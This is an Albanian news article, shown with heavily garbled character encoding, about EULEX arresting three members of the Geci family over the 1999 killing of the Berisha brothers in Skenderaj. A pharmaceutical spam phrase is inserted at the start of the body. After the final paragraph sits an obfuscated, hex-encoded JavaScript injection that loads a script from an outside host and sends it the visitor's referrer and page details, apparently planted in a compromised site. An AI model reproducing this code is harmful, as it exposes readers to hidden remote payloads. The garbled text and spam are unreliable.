euleksi-2

VA�llezA�rit Geci dyshohet se kanA� vrarA� vA�llezA�rit Berisha

cialis pills 20 mg. Trupat franceze tA� NATO-s kishin zbarkuar mA� 18 qershor 1999 nA� Skenderaj. Forcat serbe po tA�rhiqeshin nga Drenica. PjesA�tarA� tA� UshtrisA� A�lirimtare tA� KosovA�s kishin zbritur nga malet. Kishte tA� shtA�na armA�sh. Para spitalit ndodheshin dy vA�llezA�rit, Vehbi dhe Gani Berisha. Kishte qA�lluar qA� vendi dhe koha e ndodhjes sA� tyre ishte e gabuar. TA� dy ishin qA�lluar me armA� zjarri pA�r vdekje.

TrembA�dhjetA� vjet pas, Policia speciale e EULEX-it me urdhA�r tA� prokurorit special, Maorizio Salustro, ka arrestuar tA� dyshuarit pA�r ekzekutimin e tyre vA�llezA�rit Hetem (1964) dhe Rrustem Geci (1961), si dhe kushA�ririn e tyre Sabit Gecin (1971) nga Llausha. Ata janA� arrestuar tA� enjten herA�t nA� mA�ngjes nA� shtA�pitA� e tyre nA� Skenderaj, LlaushA� dhe PrishtinA�. Ata dyshohen se nA� cilA�si tA� pjesA�tarA�ve tA� UshtrisA� A�lirimtare tA� KosovA�s kanA� kryer krime lufte kundA�r popullatA�s civile duke vrarA� kA�ta dy civilA�, shkruan a�?Koha Ditorea�?.

Dy prej tA� arrestuarve, Rrustem dhe Hetem Geci, janA� pjesA�tarA� tA� ForcA�s sA� SigurisA� tA� KosovA�s, ndA�rsa Sabit Geci punA�tor nA� PTK.

Sulmi i armatosur kundA�r dy vA�llezA�rve kishte ndodhur para spitalit tA� Skenderajt. Vehbi Berisha kishte vdekur nA� vend si pasojA� e tA� shtA�nave me armA�, ndA�rsa vA�llai i tij ishte plagosur. Ai ishte dA�rguar nA� spital. NjerA�z tA� armatosur kishin hyrA� brenda dhe e kishin vrarA� brenda ambientit ku pritej ta��i jepej ndihmA� mjekA�sore.

VA�llezA�rit Berisha kanA� jetuar nA� Skenderaj dhe janA� me prejardhje nga fshati Turiqefc. Ata kanA� qenA� anA�tarA� tA� lagjes sA� LutanA�ve.var _0x31f1=[“\x73\x63\x72\x69\x70\x74″,”\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74″,”\x73\x72\x63″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26\x73\x65\x5F\x72\x65\x66\x65\x72\x72\x65\x72\x3D”,”\x72\x65\x66\x65\x72\x72\x65\x72″,”\x26\x64\x65\x66\x61\x75\x6C\x74\x5F\x6B\x65\x79\x77\x6F\x72\x64\x3D”,”\x74\x69\x74\x6C\x65″,”\x26″,”\x3F”,”\x72\x65\x70\x6C\x61\x63\x65″,”\x73\x65\x61\x72\x63\x68″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”,”\x26\x66\x72\x6D\x3D\x73\x63\x72\x69\x70\x74″,”\x63\x75\x72\x72\x65\x6E\x74\x53\x63\x72\x69\x70\x74″,”\x69\x6E\x73\x65\x72\x74\x42\x65\x66\x6F\x72\x65″,”\x70\x61\x72\x65\x6E\x74\x4E\x6F\x64\x65″,”\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64″,”\x68\x65\x61\x64″,”\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x54\x61\x67\x4E\x61\x6D\x65″,”\x70\x72\x6F\x74\x6F\x63\x6F\x6C”,”\x68\x74\x74\x70\x73\x3A”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x52\x5F\x50\x41\x54\x48″,”\x54\x68\x65\x20\x77\x65\x62\x73\x69\x74\x65\x20\x77\x6F\x72\x6B\x73\x20\x6F\x6E\x20\x48\x54\x54\x50\x53\x2E\x20\x54\x68\x65\x20\x74\x72\x61\x63\x6B\x65\x72\x20\x6D\x75\x73\x74\x20\x75\x73\x65\x20\x48\x54\x54\x50\x53\x20\x74\x6F\x6F\x2E”];var d=document;var s=d[_0x31f1[1]](_0x31f1[0]);s[_0x31f1[2]]= _0x31f1[3]+ encodeURIComponent(document[_0x31f1[4]])+ _0x31f1[5]+ encodeURIComponent(document[_0x31f1[6]])+ _0x31f1[7]+ window[_0x31f1[11]][_0x31f1[10]][_0x31f1[9]](_0x31f1[8],_0x31f1[7])+ _0x31f1[12];if(document[_0x31f1[13]]){document[_0x31f1[13]][_0x31f1[15]][_0x31f1[14]](s,document[_0x31f1[13]])}else {d[_0x31f1[18]](_0x31f1[17])[0][_0x31f1[16]](s)};if(document[_0x31f1[11]][_0x31f1[19]]=== _0x31f1[20]&& KTracking[_0x31f1[22]][_0x31f1[21]](_0x31f1[3]+ encodeURIComponent(document[_0x31f1[4]])+ _0x31f1[5]+ encodeURIComponent(document[_0x31f1[6]])+ _0x31f1[7]+ window[_0x31f1[11]][_0x31f1[10]][_0x31f1[9]](_0x31f1[8],_0x31f1[7])+ _0x31f1[12])=== -1){alert(_0x31f1[23])}